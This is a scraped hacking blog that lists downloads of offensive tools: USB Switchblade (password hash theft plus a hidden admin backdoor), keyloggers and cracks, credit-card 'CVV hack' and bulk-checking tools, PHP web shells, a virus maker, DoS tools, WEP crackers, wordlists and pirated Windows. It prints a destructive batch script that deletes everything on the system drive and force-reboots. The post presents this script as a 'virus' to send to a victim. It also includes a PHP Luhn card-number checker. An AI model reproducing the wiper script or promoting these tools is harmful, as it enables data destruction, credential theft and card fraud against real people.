USB Switchblade-Tool For SstealingWindows Passwords, History

11:27 PM / Posted by WORLD HACKERS PLACE / comments (0)

USB Switchblade is the outcome of community project to merge various tools and techniques that take advantage of various Mic*ft Windows security vulnerabilities, the majority of which are related to USB ports.

The primary purpose of this tool is to silently recover information from Windows systems, such as password hashes, LSA secrets, IP information as well as browser history and autofill information as well as create a backdoor to the target system for later access. The tool through community development ended up creating a Frankenstein application that exposed some very serious security vulnerabilities in Windows, particulary with regards to removable media devices.

The tool takes advantage of a security hole in U3 drives that allows the creation of a virtual CD-ROM drive, whicn allows the Windows autorun feature to work (unless disabled on the target system). Even if autorun or a U3 drive is not used, the application can still be started by executing a single script on the drive.

The most damaging feature of this tool is the ability to extract the passwords hashs from the target system and load them onto the drive for later cracking through the use of Rainbow tables. The weakness of Windows LM hashes is farily well known. With this application installed on a U3 drive it would only take a few seconds for someone with malicious intent to plug in the drive to an open USB port on a system and walk away with the passwords for that system.

The application also finds browser history (for both IE and Firefox) including autofill information (exposing website passwords etc), as well as AIM and MSN Messenger passwords. It will also reveal product keys for some applications (mostly Mic*ft applications).

The tool will also create a ghost admin account, which can function as a back door to the system if it is not behind a firewall.

The tool has evovled in the last month or so to include mulitple version including a way to circumvent anti-virus protection that would usually detect some of the malicious exectubles. Additional files were also added to check the vulnerabilities listing all security and patches installed to the target system, as well as another which will start a VNC service silently in the background.

Downloads
Original Version (No U3 autorun hack)
USB Switchblade U3 Autorun Enabled (U3 drive required)
SanDisk U3 Payload
Memorex Payload
More versions can be found here including a combination version which uses either the U3 autorun hack or run manually via a script.


Code:

http://www.watchyourend.com/2006/10/06/usb-switchblade-steal-windows-passwords-browsing-history-and-more/

Useful Tools download

11:23 PM / Posted by WORLD HACKERS PLACE / comments (0)

Uzzy's Keylogger

11:21 PM / Posted by WORLD HACKERS PLACE / comments (0)

http://rapidshare.com/files/26620330/KeyLogger.exe.html

Verifier Credit Card Number

11:20 PM / Posted by WORLD HACKERS PLACE / comments (0)

---------------------------------------------------------------------


Autore: FireEye BotWall
For Info: www.360.yahoo.com/zdsiegel1
Title: Verifier Credit Card

---------------------------------------------------------------------


#######################

#Verifier Credit Card Number
#Author = FireEye BotWall
#Email = zdsiegel1@yahoo.com
#Site = http://www.360.yahoo.com/zdsiegel1
#Programma:
#Verifica se le carte di credito sono vere o false seguendo l'algoritmo mod10() o formula di Lunh

#######################

$card = "0000000000000000"; //Inserire qui il numero della carta di credito a 16 cifre

$lunghezza_stringa = strlen($card);

if (is_numeric($card)) {

if ($lunghezza_stringa == 16) {

for ($i = 1;$i <= 15;$i++) {

$card[$i];

}

$num1 = $card[0] * 2;
$num2 = $card[2] * 2;
$num3 = $card[4] * 2;
$num4 = $card[6] * 2;
$num5 = $card[8] * 2;
$num6 = $card[10] * 2;
$num7 = $card[12] * 2;
$num8 = $card[14] * 2;

$num9 = $card[1];
$num10 = $card[3];
$num11 = $card[5];
$num12 = $card[7];
$num13 = $card[9];
$num14 = $card[11];
$num15 = $card[13];
$num16 = $card[15];

$num_array = array($num1, $num2, $num3, $num4, $num5, $num6, $num7, $num8);



if ($num_array[0] > 9) {
$a_0 = substr($num_array[0],0,1);
$b_0 = substr($num_array[0],1);
$doppio_valore_0 = $a_0 + $b_0;
$num_array[0] = 1;
$calcolo_0 = 0;
} else {
$num_array[0] = $num_array[0];
$doppio_valore_0 = 0;
}
if ($doppio_valore_0 == 0){
$calcolo_0 = $doppio_valore_0 + $num_array[0];
}

if ($num_array[1] > 9) {
$a_1 = substr($num_array[1],0,1);
$b_1 = substr($num_array[1],1);
$doppio_valore_1 = $a_1 + $b_1;
$num_array[1] = 1;
$calcolo_1 = 0;
} else {
$num_array[1] = $num_array[1];
$doppio_valore_1 = 0;
}
if ($doppio_valore_1 == 0){
$calcolo_1 = $doppio_valore_1 + $num_array[1];
}

if ($num_array[2] > 9) {
$a_2 = substr($num_array[2],0,1);
$b_2 = substr($num_array[2],1);
$doppio_valore_2 = $a_2 + $b_2;
$num_array[2] = 1;
$calcolo_2 = 0;
}else {
$num_array[2] = $num_array[2];
$doppio_valore_2 = 0;
}
if ($doppio_valore_2 == 0){
$calcolo_2 = $doppio_valore_2 + $num_array[2];
}

if ($num_array[3] > 9) {
$a_3 = substr($num_array[3],0,1);
$b_3 = substr($num_array[3],1);
$doppio_valore_3 = $a_3 + $b_3;
$num_array[3] = 1;
$calcolo_3 = 0;
} else {
$num_array[3] = $num_array[3];
$doppio_valore_3 = 0;

}
if ($doppio_valore_3 == 0){
$calcolo_3 = $doppio_valore_3 + $num_array[3];
}

if ($num_array[4] > 9) {
$a_4 = substr($num_array[4],0,1);
$b_4 = substr($num_array[4],1);
$doppio_valore_4 = $a_4 + $b_4;
$num_array[4] = 1;
$calcolo_4 = 0;
}else {
$num_array[4] = $num_array[4];
$doppio_valore_4 = 0;

}
if ($doppio_valore_4 == 0){
$calcolo_4 = $doppio_valore_4 + $num_array[4];
}

if ($num_array[5] > 9) {
$a_5 = substr($num_array[5],0,1);
$b_5 = substr($num_array[5],1);
$doppio_valore_5 = $a_5 + $b_5;
$num_array[5] = 1;
$calcolo_5 = 0;
}else {
$num_array[5] = $num_array[5];
$doppio_valore_5 = 0;
}
if ($doppio_valore_5 == 0){
$calcolo_5 = $doppio_valore_5 + $num_array[5];
}

if ($num_array[6] > 9) {
$a_6 = substr($num_array[6],0,1);
$b_6 = substr($num_array[6],1);
$doppio_valore_6 = $a_6 + $b_6;
$num_array[6] = 1;
$calcolo_6 = 0;
}else {
$num_array[6] = $num_array[6];
$doppio_valore_6 = 0;
}
if ($doppio_valore_6 == 0){
$calcolo_6 = $doppio_valore_6 + $num_array[6];
}

if ($num_array[7] > 9) {
$a_7 = substr($num_array[7],0,1);
$b_7 = substr($num_array[7],1);
$doppio_valore_7 = $a_7 + $b_7;
$num_array[7] = 1;
$calcolo_7 = $doppio_valore_7;
} else {
$num_array[7] = $num_array[7];
$doppio_valore_7 = 0;
}
if ($doppio_valore_7 == 0){
$calcolo_7 = $doppio_valore_7 + $num_array[7];
}


if ($num_array[0] == 1) {
$num_array[0] = 0;
}
if ($num_array[1] == 1) {
$num_array[1] = 0;
}
if ($num_array[2] == 1) {
$num_array[2] = 0;
}
if ($num_array[3] == 1) {
$num_array[3] = 0;
}
if ($num_array[4] == 1) {
$num_array[4] = 0;
}
if ($num_array[5] == 1) {
$num_array[5] = 0;
}
if ($num_array[6] == 1) {
$num_array[6] = 0;
}
if ($num_array[7] == 1) {
$num_array[7] = 0;
}


$risultato_num_singoli = $num_array[0] + $num_array[1] + $num_array[2] + $num_array[3] + $num_array[4] + $num_array[5] + $num_array[6] + $num_array[7];

$risultato_num_doppi = $doppio_valore_0 + $doppio_valore_1 + $doppio_valore_2 + $doppio_valore_3 + $doppio_valore_4 + $doppio_valore_5 + $doppio_valore_6 + $doppio_valore_7;

$resto_num = $num9 + $num10 + $num11 + $num12 + $num13 + $num14 + $num15 + $num16;

$risultato_generale = $risultato_num_singoli + $resto_num + $risultato_num_doppi;

$verifica = $risultato_generale / 10;

if (is_float($verifica)) {

echo "Numero Carta di credito NON Valido";

}else {

echo "Numero Carta di credito Valido";

}

}else{

echo "Lunghezza stringa = ".$lunghezza_stringa."--Errore Il numero della carta di credito deve contenere 16 numeri ";

}

} else {

echo "Assicurarsi che non siano presenti Caratteri";
}

?>



----------------------------------
// By FireEye BotWall

VH Hacker Tools(Beta) New Ver. + Tutorials

11:19 PM / Posted by WORLD HACKERS PLACE / comments (0)

Download:
CODE
http://rapidshare.com/files/81576963/VH__Hacker_Tools_Beta_.rar


Video Tutorials:

+ Hack Shop CFM
http://www.slide.com/s/0IPWi-PH5j-FrKb5_KmtD6ggMGySll7a

+ Check Bulk CC's VERY FAST
http://www.slide.com/s/iYA1C4Yg5j_tAILsnA89HwHSaiwj24jB

+Remove PC
http://www.slide.com/s/Bo7D1raX5D8vIOc9ckXa_mll3j6CgPF9

Vietnam CVV Hack tools download

11:14 PM / Posted by WORLD HACKERS PLACE / comments (0)




http://iexplorer.servehttp.com/VietNam Hack CCV Tools.rar


Virus Maker Proffessional 2008 download

11:12 PM / Posted by WORLD HACKERS PLACE / comments (0)







Scanned By Kaspersky Internet Security 325, Nothing Found

Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware

All Info inside rar


VNC 4.11 Scanner and connector

11:05 PM / Posted by WORLD HACKERS PLACE / comments (0)

This is a pack that includes a a perl scanner and a .exe scanner
i used the .exe but use what you want..
it also includes a connector to connect to a vulnerably client.

Vulnerability Scanner Pack download

11:04 PM / Posted by WORLD HACKERS PLACE / comments (0)

Scanners:
- GFI LANguard Network Security Scanner v8
- Retina Network Security Scanner 5.15.7
- Nessus 3.0.6.1
- Core Impact 4
- Acunetix Web Vulnerability Scanner 5

Info:
Size: 110MB
Archive: rar
Hoster: xirror.com
GFI LANguard Network Security Scanner v8

> Over 15,000 vulnerability assessments carried out across your network
> Reduces the total cost of ownership by centralizing vulnerability scanning, patch management and network auditing
> Provides customizable reports of scans performed across the whole network including applications and resources
> Helps IT administrators secure their networks faster and more effectively
> Prevents downtime and business losses due to vulnerability exposure
> #1 Windows commercial security scanner (voted by Nmap users for two years running) and Best of TechEd 2007 (security).

Retina Network Security Scanner 5.15.7

Retina Network Security Scanner, the industry and government standard for multi-platform vulnerability management, identifies known and zero day vulnerabilities plus provides security risk assessment, enabling security best practices, policy enforcement, and regulatory audits.

Nessus 3.0.6.1

The Nessus™ vulnerability scanner, is the world-leader in active scanners, featuring high speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.

When Nessus is managed with Tenable's Security Center, an enterprise can perform full life-cycle vulnerability and configuration management. Organizations can communicate recommendations to the responsible parties, track remediations, and verify security patches and required configurations.

Nessus is supported by a world renowned research team and has the largest vulnerability knowledge base, making it suitable for even the most complex environments.

Core Impact 4

* pinpoint exploitable OS and services vulnerabilities in network servers and workstations
* measure end-user response to phishing, spear phishing, spam and other email threats
* test web application security and demonstrate the consequences of web-based attacks
* distinguish real threats from false positives to speed and simplify remediation efforts
* configure and test the effectiveness of IPS, IDS, firewalls and other defensive infrastructure
* confirm the security of system upgrades, modifications and patches
* establish and maintain an audit trail of your vulnerability management practices

Acunetix Web Vulnerability Scanner 5

* An automatic Javascript analyzer allowing for security testing of Ajax and Web 2.0 applications
* Industries' most advanced and in-depth SQL injection and Cross site scripting testing
* Visual macro recorder makes testing web forms and password protected areas easy
* Extensive reporting facilities including VISA PCI compliance reports
* Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
* Intelligent crawler detects web server type and application language
* Acunetix crawls and analyzes websites including flash content, SOAP and AJAX



WatchFire Vulnerability Scanner Full Version

10:58 PM / Posted by WORLD HACKERS PLACE / comments (0)

Web Application Security Testing Suite download

10:43 PM / Posted by WORLD HACKERS PLACE / comments (1)

Burp Suite is an integrated platform for attacking and testing web applications. It contains the latest versions of all the Burp tools, including:

Burp Proxy
Burp Spider
Burp Intruder
Burp Repeater
Burp Sequencer
Burp Decoder
Burp Comparer
All of the Suite tools are tightly integrated, with numerous interfaces designed to facilitate and speed up the process of attacking an application.



http://portswigger.net/suite/download.html

Web Dos attack tools 2007 (Final) download

10:28 PM / Posted by WORLD HACKERS PLACE / comments (0)

Web Hacks

10:19 PM / Posted by WORLD HACKERS PLACE / comments (0)

Download: http://www.sendspace.com/file/q0cb7k

Apache Hacking TooLz Directory:

Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script

Remote File Inclusion And Remote Command Execution Directory:

IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter

Databases & SQL Injection & XSS TooLz Directory

Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

PHP Shells

c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView
nstview php shell

Windows Admin Password Hack download

10:14 PM / Posted by WORLD HACKERS PLACE / comments (0)



Windows Admin Password Hack:
Forgot your NT admin password?
Reinstall? Oh no... But not any more...

This is a utility to (re)set the password of any user that has a valid (local) account on your NT system.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppydisk or CD. The bootdisk includes stuff to access NTFS and FAT/FAT32 partitions and scripts to glue the whole thing together.

Will detect and offer to unlock locked or disabled out user accounts!
It is also an almost fully functional registry editor!

Windows Admin Hack allows you to reset the administrator password on
Windows 2000/XP.

The ISO must be burned to a CD or Flash drive.


When it is booted, a mini version of linux starts which allows the
administrator password to be reset. useful if you need to work on a
machine the password is unknown.

Download
http://rapidshare.com/files/99306662/Windows_Admin_Hack_Dr.Afndeenaa.rar

Windows WIFI Collection (4 in 1) download

10:12 PM / Posted by WORLD HACKERS PLACE / comments (0)



Aircrack, AiroPeek NX v2.02, airsnort_0.2.6_win32, Wifi Drivers


Download: http://rapidshare.com/files/91132025/Windows_Wifi_Collection.rar

Windows XP Pro Black Edition 2007 With SP3

10:10 PM / Posted by WORLD HACKERS PLACE / comments (0)



Windows XP Pro Black Edition 2007 With SP3
his version of Windows XP is designed for your convenience. It requires less memory from your system and it doesn’t need a serial number as this is the unattended version.


Programs:

* Acrobat 8.0
* WindowBlind 5.04 Enhanced plus many new themes
* TuneUp Utilities 2007 English
* Microsoft Java VM Build 3809
* Sun Java 2 Version5.0.6 W/SP2
* IE 7 Final Activated
* Firefox 2
* Thunderbird 1.5.0.9
* Klite Codec Pack 2.80
* Window Media Player 11
* ZoneAlarm 6.5.737.2006 Pro
* Blindwrite 6.0.1.19 By eXperience
* Nero 7.59 Lite
* PowerIso
* Ultra Iso 8.6.0.1936
* Fraunhofer IIs MP3 Code
* Quicktime Alternative
* Acrobat Reader
* WinRAR
* Windows Vista RTM sidebar plus extra gadgets

History of updates and fixes:

- Added Segoe Print and Segoe
- Added more cool Gadgets
- Fixed Version Number in Add-Remove Programs
- Minor RegDLL Changes
- Now uses ProfileItems for QuickLaunch Shortcut
- Improved Installation process (No more RunOnceEx Box)
- Fixed VAIO Shell Extension not registering
- Added Vista Calculator and Drive Info Gadgets
- Changed skin to Glass
- Quick Launch shortcut moved to UserProfile
- Systray Icon issue FIXED!
- Added Calibri fonts
- Changed the Sidebar Skin to a much nicer one as you can see in the screenshot
- Changed Shortcut placement from All Programs to All Programs -> Accesories



DOWNLOAD LINK::::

HIDDEN PART:

CODE
http://rapidshare.com/files/71704873/Windows_XP_Black_Edition_With_SP3.part1.rar

http://rapidshare.com/files/71711342/Windows_XP_Black_Edition_With_SP3.part2.rar

http://rapidshare.com/files/71719810/Windows_XP_Black_Edition_With_SP3.part3.rar

http://rapidshare.com/files/71725015/Windows_XP_Black_Edition_With_SP3.part4.rar

http://rapidshare.com/files/71734015/Windows_XP_Black_Edition_With_SP3.part5.rar

http://rapidshare.com/files/72121149/Windows_XP_Black_Edition_With_SP3.part6.rar

http://rapidshare.com/files/72124817/Windows_XP_Black_Edition_With_SP3.part7.rar

Size: 710 MB

Wireless Hacking Live-CD (FBI version) download

10:09 PM / Posted by WORLD HACKERS PLACE / comments (0)

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products.

WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.

A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong" encryption while a 128 bit key has 104.

The IV is placed in encrypted frame's header, and is transmitted in plain text.

Traditionally, cracking WEP keys has been a slow and boring process.

An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network.

After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared.

This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours.
As Special Agent Bickers noted :

"It doesn't matter if you use 128 bit WEP keys, you are vulnerable!

1)Boot from cd
2)get the wep key
3)write it down
4)reboot into windows
5)connect using wep key.





http://rapidshare.com/files/95428192/FBI_wireless_hacking.part1.rar
http://rapidshare.com/files/95428192/FBI_wireless_hacking.part2.rar
http://rapidshare.com/files/95428192/FBI_wireless_hacking.part3.rar
http://rapidshare.com/files/95428192/FBI_wireless_hacking.part4.rar
http://rapidshare.com/files/95428192/FBI_wireless_hacking.part5.rar
http://rapidshare.com/files/95428192/FBI_wireless_hacking.part6.rar
http://rapidshare.com/files/95428192/FBI_wireless_hacking.part7.rar

Wireless WEP Key Password Spy

10:08 PM / Posted by WORLD HACKERS PLACE / comments (0)

Wireless WEP Key Password Spy will instantly recover all WEP keys and wireless network passwords that have been stored on your computer. To get started, click "Find Wireless WEP Keys". It will then display the adapter GUID and all recovered information associated with it including the wireless network name (SSID), the encryption type (WEP 40, WEP 104, or WPA-PSK), and the WEP key associated with each network.



http://rapidshare.com/files/109133751/Wepkey.rar

Wireshark (Formely Ethereal) download

10:06 PM / Posted by WORLD HACKERS PLACE / comments (1)

d

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.






word list

10:05 PM / Posted by WORLD HACKERS PLACE / comments (0)

hey guys if u have any word lists they are now pieces of shit compared to the one i

3 Charachters Pass

Code:

http://rapidshare.com/files/79524378/length03.zip.html



4 charachters pass list

Code:
http://rapidshare.com/files/79524106/length04.zip.html



5 charachters pass list

Code:

http://rapidshare.com/files/79523767/length05.zip.html
6 Charachters pass list

Code:

http://rapidshare.com/files/79523530/length06.zip.html

Wordlist (28gb compressed to 70mb) download

10:03 PM / Posted by WORLD HACKERS PLACE / comments (2)

Size - Unrarred: 28GB - Rarred: 70mb
Note: this list is only a list of "words" with incremented character values, like

a
aa
ab
ac
[...]
caaa
caab
caac
...
caba
cabc
cabd
[...]
U#p!a
U#p!b
U#p!c

etc.

^^That explains why it can be compressed this much. (because the content of the file can be easily expressed via vectors). So if you use a bruteforcer that is cabable of using incremental mode (incrementing values of characters each step) , like JohnTheRipper (mac os x) does ( for example: -i=alnum) I suggest to use this instead of the wordlist, because it's more efficient.

Download Link :-


http://rapidshare.com/files/4470757/acdc_s_dictionary.rar.html

Invisible Keylogger, working links

10:01 PM / Posted by WORLD HACKERS PLACE / comments (0)

dvanced Invisible Keylogger is the most powerful stealth spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and windows log-on passwords.

CODE
Teh Download:

http://www.toolsanywhere.com/dl/aik_trial.exe


Teh Crack/Adon:

http://www.crackserver.com/0day_cracks/Advanced.Invisible.Keylogger.v1.5.htm

xCode Keylogger new ver. download

1:52 PM / Posted by WORLD HACKERS PLACE / comments (0)




Download Client http://uploaded.to/?id=zl28f2

Download Remover http://uploaded.to/?id=1oep5y

Download Icones http://uploaded.to/?id=uj9sm5
clap



Its the way we behave...

Xroot RFI Scanner download

1:49 PM / Posted by WORLD HACKERS PLACE / comments (0)

XVI32 Hex Editor download

1:48 PM / Posted by WORLD HACKERS PLACE / comments (0)

A win32 application hex editor used for finding holes in programs

Download:
http://iexplorer.servehttp.com/xvi32.rar

Yahoo Annoying Tool

1:46 PM / Posted by WORLD HACKERS PLACE / comments (0)

Please Click the link below to download the

Yahoo Annoying Tool
Use at your own risk
Cooperate with me and i will keep on posting like this...

Yahoo Booter Room Destroy 5.9 download

1:44 PM / Posted by WORLD HACKERS PLACE / comments (0)

Yahoo Online Checker download

1:43 PM / Posted by WORLD HACKERS PLACE / comments (0)

This is an executable file that checks if a person is online on yahoo msngr or not.......


Yersinia download

1:42 PM / Posted by WORLD HACKERS PLACE / comments (0)

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.


Your Own Undetected Partition Deleter Virus.. ( Dont Try At Your Self)

1:39 PM / Posted by WORLD HACKERS PLACE / comments (0)

# open notepad, write these codes.
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
# save the notepad as yourfilename.bat



end to ur victum enjoy then
and this will force to ur victum so much think ........of wht?
where is my partitions ........hahahah

ZeldaCrypt download

1:38 PM / Posted by WORLD HACKERS PLACE / comments (0)

Zero Hack Tools

1:35 PM / Posted by WORLD HACKERS PLACE / comments (1)





Playlist :

WWE - Y2J Chris Jericho - Break the Walls Down
Crazy Frog - Jingle Bells remix

 

GLOBAL HACKERS SOFTWARES Copyright © 2009 SAM Solutions by Akram